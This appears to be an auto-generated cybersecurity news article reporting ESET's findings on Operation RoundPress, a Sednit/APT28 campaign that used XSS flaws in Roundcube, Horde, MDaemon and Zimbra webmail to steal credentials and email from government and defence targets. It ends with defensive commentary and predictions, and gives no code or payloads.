Listen to this Post
Cyber espionage is evolving rapidly, and a newly revealed campaign called Operation RoundPress shows just how dangerous these threats have become. This attack is linked to the notorious Russian hacker group Sednitâalso known by names like APT28 or Fancy Bearâthought to be connected to Russiaâs military intelligence, the GRU. By exploiting vulnerabilities in popular webmail servers such as Roundcube, Horde, MDaemon, and Zimbra, this group is injecting custom JavaScript malware to steal sensitive information from high-profile government and defense targets.
Operation RoundPress was first detected in 2023, initially targeting a known security flaw (CVE-2020-35730) in Roundcube. But in 2024, the campaign dramatically expanded, weaponizing new vulnerabilities including a zero-day in MDaemon (CVE-2024-11182) before patches were available. The attackers begin by sending highly targeted spearphishing emails containing hidden cross-site scripting (XSS) exploits. When victims open these emails in vulnerable webmail clients, malicious JavaScript runs automatically in their browser sessions, stealing login credentials, email content, contacts, and even bypassing two-factor authentication protections.
Researchers from ESET have linked this operation to Sednit with medium confidence due to overlapping infrastructure, phishing styles, and code signatures found in previous Sednit attacks. The campaign primarily focuses on Eastern European governments and defense companies involved in the conflict in Ukraine, but attacks have also been reported in Africa, South America, and various EU countries.
Inside the Attack: The Technical Breakdown
Operation RoundPress uses four custom JavaScript payloadsâSpyPress.HORDE, SpyPress.MDAEMON, SpyPress.ROUNDCUBE, and SpyPress.ZIMBRAâeach crafted specifically for its target webmail platform. These payloads are heavily obfuscated, employing encrypted configurations and randomized code to slip past detection systems. Once the XSS attack succeeds, the malware:
Harvests credentials by manipulating login forms or presenting fake login screens.
Automatically collects and sends out emails, address books, and account settings.
Establishes persistence by creating forwarding rules, like Sieve scripts in Roundcube.
Extracts two-factor authentication secrets and creates âapp passwordsâ to bypass MFA in MDaemon.
All stolen data is quietly sent to attacker-controlled servers over encrypted HTTPS connections. The infrastructure shows clear overlaps in command-and-control domains and IP addresses, indicating a highly coordinated operation.
The exploited vulnerabilities vary by platform. Roundcube falls prey to XSS flaws in email rendering, MDaemon suffers from a parsing bug allowing arbitrary script execution, Zimbraâs calendar invite headers are improperly sanitized, and Horde faces legacy XSS issuesâsome attack attempts even appear misconfigured but still reveal the groupâs persistence.
The consequences are severe. Throughout 2024, numerous governments and defense contractors across Bulgaria, Ukraine, Romania, Cameroon, Ecuador, Cyprus, Serbia, and other countries faced these attacks. The theft of sensitive communications and credentials seriously undermines operational security, especially amid ongoing geopolitical tensions.
This operation highlights the critical need for rapid patching of webmail servers, combined with layered email security and behavioral monitoring to detect anomalous activity early. Sednitâs swift exploitation of zero-days and refined malware delivery shows just how sophisticated state-backed cyber threats have become.
What Undercode Say:
Operation RoundPress is a textbook example of how cyber espionage groups exploit the smallest security gaps to achieve wide-reaching intelligence gains. Sednitâs approach reflects a deep understanding of webmail architectures and the human elementâusing spearphishing emails as the entry point. The reliance on cross-site scripting vulnerabilities reveals a larger issue: webmail platforms often fail to sanitize user inputs adequately, leaving critical backdoors open.
By targeting email services, attackers gain access to the heart of digital communication in government and defense sectors. Email servers are treasure troves of confidential strategies, contacts, and sensitive discussions. The addition of stealthy malware that can bypass multi-factor authentication dramatically raises the stakes, signaling that even best practices like MFA are not a silver bullet.
The geographic spread of targets shows a dual focus on the Ukraine conflict and broader intelligence collection, suggesting Sednitâs goals extend beyond regional skirmishes to global strategic espionage. Notably, the operationâs emphasis on persistence mechanismsâsuch as email forwarding rulesâillustrates a long-term surveillance mindset rather than a hit-and-run attack.
Security teams managing webmail infrastructure should take immediate note. Beyond applying patches for known vulnerabilities, organizations must implement advanced anomaly detection on email server behavior, audit forwarding rules frequently, and train users on recognizing phishing attempts. The campaignâs use of heavily obfuscated JavaScript payloads underscores the necessity for robust endpoint protection capable of analyzing script behavior in real time.
Furthermore, the operation serves as a warning about zero-day vulnerabilities and how quickly they can be weaponized. The window between discovery and patching is often exploited by well-funded actors like Sednit. This dynamic underlines the importance of threat intelligence sharing among governments and private sectors, fostering rapid identification and neutralization of emerging threats.
In the bigger picture, Operation RoundPress exemplifies the evolving cyber threat landscape where state-sponsored groups adapt with agility, combining technical innovation with social engineering. As webmail remains a staple of professional communication worldwide, its security will remain a high-value target for espionage campaigns.
Fact Checker Results:
The campaignâs link to Sednit is supported by credible threat intelligence with medium confidence.
Multiple zero-day and known vulnerabilities were exploited across popular webmail platforms.
The primary targets are consistent with known geopolitical hotspots, reinforcing the espionage motive. â
Prediction:
Given Sednitâs rapid adoption of new exploits and its focus on critical communication channels, we can expect continued evolution of these attack techniques. Webmail platforms will face increasing pressure to strengthen security measures, possibly integrating more sophisticated behavioral analytics and AI-driven detection to counter stealthy JavaScript malware. Governments and defense sectors must enhance collaboration on cyber threat intelligence and prioritize proactive defense strategies, including zero-trust models and continuous vulnerability assessments. As geopolitical tensions persist, cyber espionage campaigns like Operation RoundPress will likely intensify, expanding their reach to new regions and sectors beyond traditional military and government targets.
References:
Reported By: cyberpress.org
Extra Source Hub:
https://stackoverflow.com
Wikipedia
Undercode AI
Image Source:
Unsplash
Undercode AI DI v2
